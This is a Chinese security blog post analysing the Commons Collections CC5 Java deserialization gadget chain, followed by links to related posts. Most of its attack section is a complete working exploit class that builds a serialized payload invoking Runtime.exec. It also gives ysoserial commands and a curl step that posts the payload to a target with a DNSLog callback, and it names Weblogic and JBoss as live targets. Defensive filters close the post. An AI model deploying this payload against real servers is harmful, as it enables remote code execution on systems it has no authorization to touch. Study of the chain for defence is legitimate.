java反序列化:CC5利用链解析

原创 于 2025-06-03 20:48:49 发布 · 1.3k 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java #web安全 #网络安全 #反序列化

CommonsCollections5(CC5)是Apache Commons Collections反序列化漏洞利用链的重要变种,由安全研究员Matthias Kaiser在2016年发现。本文将深入剖析其原理、构造技巧和防御方案。

一、CC5链技术背景

CC5链在Java 8u76之前有效,利用BadAttributeValueExpException作为入口点,结合TiedMapEntryLazyMap实现代码执行。相比CC1链,它解决了以下问题:

  1. 绕过AnnotationInvocationHandler依赖(Java 8u71+修复)
  2. 兼容更高版本JDK(8u76前)
  3. 使用更通用的JDK内置类

二、漏洞利用链原理

完整调用链

	Gadget chain:
        ObjectInputStream.readObject()
            BadAttributeValueExpException.readObject()
                TiedMapEntry.toString()
                    LazyMap.get()
                        ChainedTransformer.transform()
                            ConstantTransformer.transform()
                            InvokerTransformer.transform()
                                Method.invoke()
                                    Class.getMethod()
                            InvokerTransformer.transform()
                                Method.invoke()
                                    Runtime.getRuntime()
                            InvokerTransformer.transform()
                                Method.invoke()
                                    Runtime.exec()

在这里插入图片描述

核心触发点分析

// javax.management.BadAttributeValueExpException
private void readObject(ObjectInputStream ois) throws IOException, ClassNotFoundException {
        ObjectInputStream.GetField gf = ois.readFields();
        Object valObj = gf.get("val", null);

        if (valObj == null) {
            val = null;
        } else if (valObj instanceof String) {
            val= valObj;
        } else if (System.getSecurityManager() == null
                || valObj instanceof Long
                || valObj instanceof Integer
                || valObj instanceof Float
                || valObj instanceof Double
                || valObj instanceof Byte
                || valObj instanceof Short
                || valObj instanceof Boolean) {
            val = valObj.toString();//漏洞触发点
        } else { // the serialized object is from a version without JDK-8019292 fix
            val = System.identityHashCode(valObj) + "@" + valObj.getClass().getName();
        }
    }

三、关键类源码剖析

1. TiedMapEntry 触发点
// org.apache.commons.collections.keyvalue.TiedMapEntry
public Object getValue() {
    return this.map.get(this.key); // 调用LazyMap.get()
}

public String toString() {
    return this.getKey() + "=" + this.getValue(); // 反序列化入口
}
2. LazyMap 利用点
// org.apache.commons.collections.map.LazyMap
public Object get(Object key) {
    if (!map.containsKey(key)) {
        Object value = factory.transform(key); // 执行Transformer链
        map.put(key, value);
        return value;
    }
    return map.get(key);
}
3. Transformer 执行链

详情请看之前的文章

// 恶意Transformer链构造
Transformer[] transformers = new Transformer[]{
    new ConstantTransformer(Runtime.class),
    new InvokerTransformer("getMethod", ...),
    new InvokerTransformer("invoke", ...),
    new InvokerTransformer("exec", ...)
};

四、完整Payload构造

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.*;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import javax.management.BadAttributeValueExpException;
import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;

public class CC5Exploit {
    public static byte[] generatePayload(String cmd) throws Exception {
        // 1. 构造Transformer执行链
        Transformer[] transformers = new Transformer[]{
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod", 
                new Class[]{String.class, Class[].class}, 
                new Object[]{"getRuntime", new Class[0]}
            ),
            new InvokerTransformer("invoke", 
                new Class[]{Object.class, Object[].class}, 
                new Object[]{null, new Object[0]}
            ),
            new InvokerTransformer("exec", 
                new Class[]{String.class}, 
                new Object[]{cmd}
            )
        };
        ChainedTransformer chain = new ChainedTransformer(transformers);
        
        // 2. 构造LazyMap
        Map innerMap = new HashMap();
        Map lazyMap = LazyMap.decorate(innerMap, chain);
        
        // 3. 构造TiedMapEntry
        TiedMapEntry entry = new TiedMapEntry(lazyMap, "trigger_key");
        
        // 4. 设置BadAttributeValueExpException
        BadAttributeValueExpException bad = new BadAttributeValueExpException(null);
        Field valField = BadAttributeValueExpException.class.getDeclaredField("val");
        valField.setAccessible(true);
        valField.set(bad, entry); // 注入恶意对象
        
        // 5. 序列化Payload
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(baos)) {
            oos.writeObject(bad);
        }
        return baos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        byte[] payload = generatePayload("calc.exe");
        
        // 模拟漏洞环境
        try (ByteArrayInputStream bais = new ByteArrayInputStream(payload);
             ObjectInputStream ois = new ObjectInputStream(bais)) {
             
            ois.readObject(); // 触发漏洞
        }
    }
}

在这里插入图片描述

  • 一般来说反序列化利用链代码的编写是倒着来写的,首先是transform链的构造,如果某个类可以调用transformChaintransform方法,则可以执行命令,发现LazyMapdget函数能执行transform方法。
  • 进一步发现TiedMapEntrytoString方法能执行LazyMapdget函数。
  • 现在要寻找一个类的readObject方法能执行toString方法,找到BadAttributeValueExpException类可以。
  • 那么通过反射构造一个恶意BadAttributeValueExpExceptionn类,通过反序列化触发readObject方法就能实现命令执行。

五、利用方式详解

1. 使用ysoserial生成Payload
java -jar ysoserial.jar CommonsCollections5 "cmd /c calc.exe" > payload.bin
2. 漏洞检测流程

  1. 环境验证

    • Commons Collections 3.1 - 3.2.1
    • JDK < 1.8u76

  2. 利用步骤

    # 生成Payload
java -jar ysoserial.jar CommonsCollections5 "nslookup dnslog.cn" > payload.bin

# 发送Payload到目标
curl http://vuln-server/deserialize --data-binary @payload.bin

# 检查DNSLog记录
3. 实战利用场景
  • Weblogic:T3协议反序列化
  • JBoss:JMXInvokerServlet
  • WebSphere:反序列化入口点
  • 自定义协议:任何接收Java序列化数据的地方

六、防御解决方案

1. 组件级防御
<!-- 升级Commons Collections -->
<dependency>
    <groupId>org.apache.commons</groupId>
    <artifactId>commons-collections4</artifactId>
    <version>4.4</version>
</dependency>
2. 代码级防护
// 使用SafeObjectInputStream
public class SecureObjectInputStream extends ObjectInputStream {
    private static final String[] ALLOWED_CLASSES = {
        "java.lang.String", 
        "java.util.HashMap"
    };

    public SecureObjectInputStream(InputStream in) throws IOException {
        super(in);
    }

    @Override
    protected Class<?> resolveClass(ObjectStreamClass desc) 
        throws IOException, ClassNotFoundException {
        
        String className = desc.getName();
        for (String allowed : ALLOWED_CLASSES) {
            if (className.equals(allowed)) {
                return super.resolveClass(desc);
            }
        }
        throw new InvalidClassException("Unauthorized deserialization", className);
    }
}
3. JVM级防护
# 启动参数添加过滤器
java -Djdk.serialFilter='!org.apache.commons.collections.**;!javax.management.BadAttributeValueExpException;!*' \
     -jar application.jar

七、技术总结与对比

特性CC1链CC5链CC7链
入口点AnnotationInvBadAttributeHashtable
JDK限制<8u71<8u76
依赖类LazyMapTiedMapEntryAbstractMap
利用复杂度中等中等复杂
通用性

CC5链核心优势

  1. 不依赖sun.reflect包,兼容性更强
  2. 使用JDK内置异常类作为入口点
  3. 构造过程无需动态代理
  4. 在Java 8u76前广泛有效

截至2023年,CC5链在未升级的Weblogic 10.3.6环境中仍有实战价值,是红队评估中的常用武器。

通过深入理解CC5链的实现机制,安全人员可以更好地进行漏洞挖掘和防御,同时为分析更复杂的反序列化漏洞奠定基础。

44、Java 序列化与反序列化解析
h3i4j的博客
06-28 18
本文深入解析Java 中的序列化与反序列化机制,涵盖了默认序列化、自定义序列化和外部化三种主要方式,并通过代码示例详细说明其使用方法。同时,文章还分析了不同场景下的选择策略,探讨了性能优化和安全风险的相关注意事项,帮助开发者全面掌握 Java 对象的持久化与传输技术。
java安全 反序列化(二)
sechelper的博客
12-07 774
java反射,CC6源码分析,LazyMap利用连,ysoserial工具
ysoserial CC5利用链分析
weixin_45805993的博客
11-16 576
前两天东华杯没打,看里面签到题用到了 BadAttributeValueExpException.做入口类似的子,就来学习下同样用了这个类的CC5 Gadget Gadget chain: ObjectInputStream.readObject() BadAttributeValueExpException.readObject() TiedMapEntry.toString() LazyMap.get()
11-java安全——java反序列化CC5CC6链分析
网络安全
07-25 2070
CC5链分析 复习LazyMap利用: https://blog.youkuaiyun.com/qq_35733751/article/details/118462281 在学习CC2时我们知道由于JDK8版本改写了AnnotationInvocationHandler类的readobject方法,CC1中LazyMap的get方法已经无法使用,CC5使用了BadAttributeValueExpException类来代替AnnotationInvocationHandler类,并且还用了一个新的类
Java反序列化CC5子学习
chenxiaoyinaida的博客
11-08 372
前言: Apache Commons Collections是一个扩展了Java标准库里的Collection结构的第三方基础库,它提供了很多强有力的数据结构类型并且实现了各种集合工具类。 前几天分析学习了一下CC1子,今天在pte课余的时候学习了一下CC5子,发现前半部分基本上和CC1基本子都基本一致 这里先放一下前面的一段: Transformer[] transformers = new Transformer[]{ new Constan...
Java安全反序列化-CC5反序列化漏洞POP链分析_ysoserial CommonsCollections5 PoC分析
Ho1aAs‘s Blog
03-12 1107
文章目录前言代码复现工具类PoC代码审计 | 原理分析1. LazyMap.get()调用this.factory.transform()2. TiedMapEntry.toString()调用this.map.get()3. BadAttributeValueExpException反序列化触发this.val.toString()POP完 前言 由于jdk8修复了AnnotationInvokerHandler,cc1用不了了 cc5cc1点基础上做了小的改进,还是使用Commons-Collect
Java安全学习笔记--反序列化漏洞利用CC5
m0_64685672的博客
01-22 1319
测试环境 jdk1.8(jdk8u71) Commons Collections4.0 在jdk1.8的时候Annotationinvocation的readObject方法被改写,cc1就不适用了,cc5是基于Lazymap类在jdk1.8使用TiedMapEntry+BadAttributeValueExpException来触发LazyMap的get方法。CC1LazyMap 利用核心 Transformer[] transformers=new Transforme.
JAVA安全—FastJson反序列化&利用跟踪&autoType绕过
2301_76227305的博客
02-07 1741
目前主流公开的利用都进行了分析,后续如果有其它的条,再慢慢分析吧。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
Java安全—原生反序列化&重写方法&条分析&触发类
2301_76227305的博客
11-27 1103
虽然今天的内容看起来有点复杂,但总结起来就一件事,想办法调用其它的readObject,而不是去调用原本的readObject。最后还是要声明一下,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
java CC 反序列化利用
最新发布
03-11
### Java Commons Collections 反序列化利用 CVE 漏洞分析 #### 背景介绍 Java中的反序列化功能允许对象在网络传输或者存储介质之间转换成字节流并恢复回原状。然而,如果应用程序在不受信任的数据源上执行反序列...
Commons-Collections篇-CC5链分析
鸣蜩十四的博客
06-26 730
CC5CC1差不多,只不过调用LazyMap.get()是通过TiedMapEntry.toString()触发的
CommonCollections5链分析
Demodd的博客
03-20 4745
前言 ​ 本文直接跟着前面文章写了,没有描述前部分poc的内容 正文 看一下cc5的Gadget Gadget chain: ObjectInputStream.readObject() BadAttributeValueExpException.readObject() TiedMapEntry.toString() LazyMap.get() Chaine
java反序列化CC5超详细易懂分析
2301_79724395的博客
04-22 561
在你学习这篇文章之前,cc1和cc6已经已经是会的,这样才能更好的来理解这篇文章。
CommonsCollections CC5
jy13172的博客
07-22 112
这个只是相当于提供了一个入口。后边条CC1的子直接用。
[JAVA反序列化初学3]Commons-Collections5利用链分析
GX233的博客
03-24 5307
[JAVA反序列化]Commons-Collections5利用链分析
Java反序列化 CC5利用记录
LTianHang的博客
02-07 266
Java反序列化 CC5利用记录
java反序列化之Commons-Collections5、6、7链分析
weixin_45682070的博客
01-14 414
cc5 前言 cc5利用两和cc1的后半段一样,就是实现ChainedTransformer类。 在cc1中也分析过,只要LazyMap触发Map类就可以达到rec的目的。 在cc5中用到的是TiedMapEntry中的toString方法。 利用环境 jdk 1.7 Commons Collections 3.1 poc package org.example.cc; import org.apache.commons.collections.Transformer; import org.apache.
6-java安全——java反序列化漏洞利用
网络安全
07-01 4754
本篇将学习java反序列化漏洞原理,然后结合一个apache commons-collections组件反序列化漏洞来学习如何构造利用。 我们知道序列化操作主要是由ObjectOutputStream类的 writeObject()方法来完成,反序列化操作主要是由ObjectInputStream类的readObject()方法来完成。当可序列化对象重写了readObject方法后,在反序列化时一般会调用序列化对象的readObject方法。 在Student类中重写ObjectInputSt
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网安spinage

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值